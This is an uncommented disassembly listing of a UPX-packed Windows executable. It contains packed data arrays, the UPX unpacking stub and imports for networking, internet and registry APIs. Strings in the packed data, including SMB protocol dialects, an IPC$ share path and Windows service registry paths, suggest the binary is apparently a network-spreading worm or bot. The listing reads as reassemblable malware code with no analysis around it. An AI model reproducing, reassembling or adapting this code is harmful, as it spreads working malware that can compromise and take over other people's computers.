dd 7BFFFFFFh, 821318C6h, 4BBF3EB3h, 0EB67E042h, 0B7378400h
dd 0D8B3AA60h, 48022D7h, 4BA67A65h, 2C5886FFh, 85FFFFFEh
dd 0F96EF645h, 2FC956EEh, 3B4A3200h, 0D87AB7A6h, 6F63EBD3h
dd 0FE9F746Eh, 7836FFFFh, 0AAD53612h, 335DABAAh, 25B966C9h
dd 5758D02h, 68AFE8Bh, 0A5F993Ch, 4607DB7Eh, 46302C06h
dd 0E2C39934h, 0FE0AEBEDh, 0E8C5DFF7h, 622ED9DAh, 712E6765h
dd 1C99993h, 91BDFD12h, 0EFEF16FDh, 0C107DFFFh, 42AA6872h
dd 0FDAA66FDh, 1C14BA10h, 0C91A98F1h, 630898F3h, 86B763FFh
dd 10097102h, 37CB5F90h, 1C965992h, 0D9180DBBh, 75B6FB5Eh
dd 0CD089B03h, 0D2251025h, 1FD83B7Dh, 5447ECE4h, 0F31B5D18h
dd 9BF3449Fh, 3FDDAF71h, 0F3198FF6h, 1065E368h, 1A0B1D1Ch
dd 5EFFD975h, 0FF24BD9Dh, 0FDADEE77h, 0FF4DDC12h, 70ADD10h
dd 33AC4Fh, 59B29D0Bh, 0DBFF67B3h, 3298E514h, 0F3451232h
dd 2C66CA89h, 0B36F7133h, 0FEFB3EDBh, 74416713h, 8AD95D1Ah
dd 9DF31134h, 98904F1h, 0EF75D27Eh, 0F32D04F1h, 0F367652Eh
dd 5D93F0E3h, 0E576DB36h, 56C92182h, 0EDB2642Eh, 0C0E86F27h
dd 169B2097h, 0B75EFF3Ch, 0E5C1D8FDh, 19C98ED5h, 0D9013BC9h
dd 64F60414h, 2363D9F9h, 632971CAh, 9161688Dh, 7F76D6F2h
dd 66F4C361h, 12CDA7EDh, 0CBC96C5Dh, 93FB794Eh, 0F2566D93h
dd 0A6485A11h, 5C14C096h, 0E1264FF6h, 0EBA7294Ch, 0FF5D9CF3h
dd 9FBE4FF6h, 7126F434h, 3BF9C2D0h, 0AEECEF13h, 0FFF3B00Bh
dd 0C5B70F6Fh, 0ECE9EDFFh, 0FCB7FDE9h, 0CB01FCE1h, 0CA2FE17Fh
dd 0E9FCFCF5h, 0EBFCF2CEh, 0AAF5FCF7h, 0F976C7ABh, 0F934FFFFh
dd 2DB459AAh, 0C91E662Ah, 0B7E7E6ACh, 0BD9CC9A5h, 71829DB8h
dd 0EEC63092h, 19BF7F1Bh, 1E145135h, 91720A95h, 30C8712Ah
dd 0FFEADFFh, 0D512A5D2h, 529AE180h, 2AAB6FAAh, 12B9C89Ah
dd 5F4A9A8Bh, 476FFB78h, 0AB9E5958h, 0A319DB9Bh, 0A26CEC20h
dd 9EED85C0h, 0B7FFF9DFh, 81E8A2FFh, 125544EBh, 961FBDC8h
dd 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 3FF7105Ah, 2DF8A161h
dd 66491719h, 12FEFD7Fh, 685AA987h, 0C26DEDDBh, 12850295h
dd 5A910482h, 0C9CFF7CBh, 0DEC1FD4Fh, 4D53FF85h, 18A97242h
dd 0FFFFC853h, 0FE0EFFh, 2006217h, 4E204350h, 4F575445h
dd 50204B52h, 52474F52h, 7DAC7F41h, 31204DF9h, 414C302Eh
dd 0A024D4Eh, 646E6957h, 0FEDF776Fh, 8C73A5F6h, 5720726Fh
dd 72676B03h, 0E70756Fh, 61312E33h, 75BF61DAh, 32234D27h
dd 32303058h, 67163232h, 0ADFE5B0h, 4C20544Eh, 3230204Dh
dd 0B00BA48Bh, 7739192h, 36300C2Eh, 23FFB7D8h, 0A110400h
dd 0D4052014h, 0BB5BEAFh, 4C0069F5h, 5053534Bh, 0B7FE7A00h
dd 8297F253h, 57E008h, 64006E24h, 77006F00h, 0BDBD7300h
dd 743AE6D8h, 8C090130h, 80350039h, 23912DB9h, 72E1Dh
dd 0D9139E40h, 2008ABDAh, 992702DAh, 39F5764h, 83206E00h
dd 2346760Dh, 0FF400747h, 63C8DCFh, 1100600h, 888A151Fh
dd 4F0048E0h, 0BFFFEC00h, 19818951h, 0E4F27A6Ah, 0AF281C49h
dd 10742530h, 29E15367h, 5C089BE4h, 0AE7575DFh, 30E583h
dd 12F5C04h, 0B15C085Ah, 61EEBB91h, 36072E4Dh, 772E3800h
dd 0BB6C1CD9h, 491B30h, 6443ECh, 73C8073Fh, 0A26463D8h
dd 6FF90708h, 4004DCCBh, 0DE00FF16h, 0E00DEh, 4D019F16h
dd 2B09098h, 37284026h, 19FBEE1Ah, 6C8B1103h, 70D374D9h
dd 0EF90A500h, 9C2A63B2h, 6077256Bh, 109FB6CFh, 1B04480Eh
dd 0B73E1354h, 5A545D75h, 22596326h, 45CBC75Ch, 0E7FCD20Eh
dd 58765h, 4810030Bh, 27FF10B8h, 2901D04Dh, 19286A01h
dd 0D0B10C39h, 0FE179B11h, 0A8FEC7h, 2ED94FC0h, 885D5FF5h
dd 0C91CEB8Ah, 3CE89F11h, 22E7102Bh, 6048D97Bh, 0A3F40CD1h
dd 5E43C860h, 0A00CA0C9h, 0BF0CB10Ch, 32393h, 40880CA0h
dd 78470900h, 0EC00EF92h, 95000703h, 7C4F4014h, 0EF645270h
dd 7000F05h, 0F6447FE1h, 85781343h, 5BAB0013h, 0E713E9A6h
dd 103CF204h, 0FEFF2FF8h, 8C60B061h, 5A40230Eh, 0FBA78408h
dd 438883A4h, 0FFEE10B9h, 0E4F26C01h, 0C10B8C9h, 70DAD20h
dd 0C3E42BCBh, 18D80F7Fh, 0F21F7001h, 0F843E4Ah, 0F950F84h
dd 0DF93C00h, 847F0220h, 550F6C0Fh, 9B0F09h, 106FA89Ah
dd 43BD9118h, 61032313h, 6E699FE5h, 50205058h, 87460072h
dd 4A6D9E42h, 6B323B01h, 4226123Ch, 7515E49Eh, 534102h
dd 914E501Ch, 0EB019EBDh, 0F37FE506h, 5C5C27FFh, 695C7325h
dd 66246370h, 71CEC81h, 6000E4FFh, 69A6CB4Ch, 34034CBAh
dd 4BE40018h, 0D34D34C4h, 7C88A434h, 0E8DF546Ch, 6948D37Fh
dd 6B2E6372h, 6E2E7261h, 61673A65h, 2DCF7073h, 646FFDD1h
dd 617A2E65h, 670D2E0Dh, 0D8FD6B09h, 696CEC17h, 251361h
dd 6B737433h, 0B76B722Eh, 6CC9D89Bh, 2E6E406Fh, 75650D75h
dd 0AD850B05h, 7265760Bh, 4F77273Bh, 47F22268h, 7467DDF2h
dd 2E63641Fh, 6F6C7375h, 0DD612D73h, 65F6ECAEh, 631A656Ch
dd 60622061h, 296D7373h, 731DB473h, 652F5D9Dh, 0BB29EF60h
dd 17726655h, 0E616C66h, 0F2536A33h, 6172674Fh, 74612E7Ah
dd 73C3876Dh, 773A96DFh, 6F76648Ah, 0BD61E6Bh, 71B7F6EDh
dd 15702D7Ah, 62610D6Dh, 67662D63h, 6FF12FCBh, 6C6B6AFFh
dd 706F6E6Dh, 75745E71h, 79787776h, 42411D7Ah, 2E22DD43h
dd 464544FFh, 4A494847h, 1E4F4E4Bh, 68B75453h, 0FB9D168Bh
dd 4553A55Ah, 0C2FED89Fh, 20A62052h, 202A2038h, 540D073Ah
dd 0E2D66C61h, 6572DB12h, 494C7968h, 0D9139543h, 500C6D93h
dd 4F0B5342h, 0DD0A474Eh, 0BBA57E0h, 35340749h, 0F14F4A8Fh
dd 0CAC3F24h, 4955512Fh, 56495254h, 2DEC6286h, 11664795h
dd 3FC2BD37h, 2E3B779Dh, 0CD657865h, 697A6F4Dh, 0BB70176Ch
dd 342FE2DDh, 0E92820F1h, 69E4706Dh, 7D0B9062h, 203B74BBh
dd 20454938h, 203B0736h, 0C5D16EC5h, 29D935DCh, 36BB6F00h
dd 713FF377h, 22C6425h, 2DFF6959h, 9F85BA31h, 755C0733h
dd 706D4374h, 785D0B75h, 723603F9h, 747F3031h, 0C3644070h
dd 7D670CF6h, 0FCA4482Dh, 0DE850A20h, 4449EF6Dh, 658F808h
dd 464F5300h, 176D8399h, 455241FEh, 63694D5Ch, 376F7366h
dd 0D15C835Ch, 43E155B0h, 0C9237275h, 0C869C556h, 3AB854DFh
dd 17AB525Ch, 54737953h, 0B0796172h, 535370D6h, 4F376F41h
dd 98F12C6Bh, 43555A72h, 0ECD94FC0h, 767B836Dh, 65765373h
dd 6F0F9D32h, 0E2C421Fh, 63655300h, 7974697Eh, 0A376AC1h
dd 6761471Bh, 0E8325F1Eh, 0D355B42Bh, 313434h, 0A0085954h
dd 64022A0Ch, 9BFFC911h, 140C466h, 74726956h, 466C6175h
dd 0BF656572h, 413F6FFDh, 636F6C6Ch, 74736C0Dh, 706D6372h
dd 430A4169h, 4679706Fh, 0E610BDD6h, 0CD656C69h, 1E657845h
dd 0FFFD3243h, 54D3885Fh, 686C6F6Fh, 33706C65h, 616E5332h
dd 6F687370h
dd 36235A74h, 630E19A8h, 1AD71238h, 7232DDD1h, 0E7540F73h
dd 0EC962C35h, 1118305Bh, 6E65704Fh, 0F6C52E0Ch, 654E4F77h
dd 65472D78h, 646F4D74h, 0D6486C75h, 8A6BDEDDh, 6D801172h
dd 464C0E6Dh, 0BE235ACDh, 4D984410h, 59EDF990h, 279EA69Bh
dd 450D614Ch, 726F7272h, 446B7DCFh, 546D23F2h, 2AA36D69h
dd 7B165B90h, 0C4182309h, 2B05DB36h, 72DA6844h, 85DC5569h
dd 616C8EE9h, 5E538A6Eh, 5F2314BBh, 74631E44h, 615B7868h
dd 1454C960h, 9D544D25h, 688AE63Bh, 764536AEh, 0DE616334h
dd 462DB40Ah, 5BD85320h, 9B6A624Fh, 2EE61B0Dh, 2F0D2C6Dh
dd 160B58B7h, 67B297Ch, 2DEC7065h, 0BB6C62DCh, 75116B63h
dd 9219B4Fh, 6F2E5AC1h, 8ADBBB53h, 4D4106C3h, 0D786C4Dh
dd 2582EB42h, 43490F26h, 0EDB6C69Ch, 656BED86h, 1C630A64h
dd 7052A46Dh, 87E7B17Bh, 0AE086CFBh, 6C6C657Ah, 129980BFh
dd 412B614Eh, 0FCEED14Fh, 67339BECh, 79654B6Ah, 0C3B41045h
dd 56F6746Eh, 0F65754Eh, 1EC00A51h, 111A2B09h, 59873008h
dd 21D8426Ch, 0A1079F10h, 0C517B70h, 65356241h, 0B1EC6853h
dd 6DCD68ADh, 7079CF6Eh, 82FB7774h, 2E48E895h, 12440A10h
dd 6CD0376Ch, 690A0E61h, 67C37966h, 75AC3686h, 362B7583h
dd 0DECE246Ch, 796FDEC2h, 106F112Ch, 0C2861E52h, 651E8FE6h
dd 0E9B266Bh, 14C7F21Bh, 75716341h, 494D7269h, 15CE0B34h
dd 133AA06Dh, 0FD28E4DEh, 7273F8E6h, 5F5F0659h, 61787843h
dd 6198E739h, 679C6930h, 67B66902h, 6863078Eh, 0FCE93828h
dd 0FB5B0D32h, 0B2707377h, 0F460665Eh, 383A270h, 4B73AAD4h
dd 32F0B658h, 1141B355h, 6C0523AEh, 40202360h, 0BA0456Eh
dd 0E66B6E8Eh, 2C897453h, 52C80EDBh, 273FFE7h, 2CB23908h
dd 0B6FB2CBh, 0CB0C1234h, 4CB2CB2h, 2091716h, 0B2CB090Dh
dd 1003012Ch, 0EB0FF213h, 4550EDE5h, 2014C03h, 7040B233h
dd 93CD00E0h, 10FF966h, 3006010Bh, 102D9012h, 20BDF549h
dd 4F020B04h, 2CDD25B9h, 1E600C07h, 9D81BC09h, 6071034h
dd 6420371Ch, 8C387879h, 2B877664h, 1E01646Ch, 0EA07F62Eh
dd 0B030162Eh, 0C43090C1h, 8F730DA4h, 2EE0040Fh, 0FB1A8264h
dd 0F616E855h, 16273407h, 0E00048C0h, 3A8952DBh, 544403h
dd 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
public start
start:
pusha
mov esi, offset dword_405000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_407042
; ---------------------------------------------------------------------------
align 8
loc_407038: ; CODE XREF: UPX1:loc_407049�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40703E: ; CODE XREF: UPX1:004070D6�j
; UPX1:004070ED�j
add ebx, ebx
jnz short loc_407049
loc_407042: ; CODE XREF: UPX1:00407030�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407049: ; CODE XREF: UPX1:00407040�j
jb short loc_407038
mov eax, 1
loc_407050: ; CODE XREF: UPX1:0040705F�j
; UPX1:0040706A�j
add ebx, ebx
jnz short loc_40705B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40705B: ; CODE XREF: UPX1:00407052�j
adc eax, eax
add ebx, ebx
jnb short loc_407050
jnz short loc_40706C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_407050
loc_40706C: ; CODE XREF: UPX1:00407061�j
xor ecx, ecx
sub eax, 3
jb short loc_407080
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
loc_40707C: ; DATA XREF: UPX0:00404854�o
; UPX0:00404868�o ...
jz short loc_4070F2
mov ebp, eax
loc_407080: ; CODE XREF: UPX1:00407071�j
add ebx, ebx
jnz short loc_40708B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40708B: ; CODE XREF: UPX1:00407082�j
adc ecx, ecx
add ebx, ebx
jnz short loc_407098
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407098: ; CODE XREF: UPX1:0040708F�j
adc ecx, ecx
jnz short loc_4070BC
inc ecx
loc_40709D: ; CODE XREF: UPX1:004070AC�j
; UPX1:004070B7�j
add ebx, ebx
jnz short loc_4070A8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4070A8: ; CODE XREF: UPX1:0040709F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40709D
jnz short loc_4070B9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40709D
loc_4070B9: ; CODE XREF: UPX1:004070AE�j
add ecx, 2
loc_4070BC: ; CODE XREF: UPX1:0040709A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_4070DC
loc_4070CD: ; CODE XREF: UPX1:004070D4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_4070CD
jmp loc_40703E
; ---------------------------------------------------------------------------
align 4
loc_4070DC: ; CODE XREF: UPX1:004070CB�j
; UPX1:004070E9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_4070DC
add edi, ecx
jmp loc_40703E
; ---------------------------------------------------------------------------
loc_4070F2: ; CODE XREF: UPX1:loc_40707C�j
pop esi
mov edi, esi
mov ecx, 9Ah
loc_4070FA: ; CODE XREF: UPX1:00407101�j
; UPX1:00407106�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_4070FF: ; CODE XREF: UPX1:00407124�j
cmp al, 1
ja short loc_4070FA
cmp byte ptr [edi], 1
jnz short loc_4070FA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_4070FF
lea edi, [esi+5000h]
loc_40712C: ; CODE XREF: UPX1:0040714E�j
mov eax, [edi]
or eax, eax
jz short loc_407177
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_407149: ; CODE XREF: UPX1:0040716F�j
mov al, [edi]
inc edi
or al, al
jz short loc_40712C
mov ecx, edi
jns short near ptr loc_40715A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_40715A: ; CODE XREF: UPX1:00407152�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_407171
mov [ebx], eax
add ebx, 4
jmp short loc_407149
; ---------------------------------------------------------------------------
loc_407171: ; CODE XREF: UPX1:00407168�j
call dword ptr [esi+7094h]
loc_407177: ; CODE XREF: UPX1:00407130�j
popa
jmp loc_402D90
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
aNrW db 'Rw',0
align 4
aJW db 'jw',0
align 4
aPV db ' v',0
align 4
dd 71AB1AF4h, 0
aKernel32_dll db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
aUser32_dll db 'USER32.dll',0
aWininet_dll db 'WININET.dll',0
aWs2_32_dll db 'WS2_32.dll',0
align 4
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 61720000h, 646Eh, 72707377h, 66746E69h, 41h, 65746E49h
dd 74656E72h, 6E65704Fh, 41h, 3A6h dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start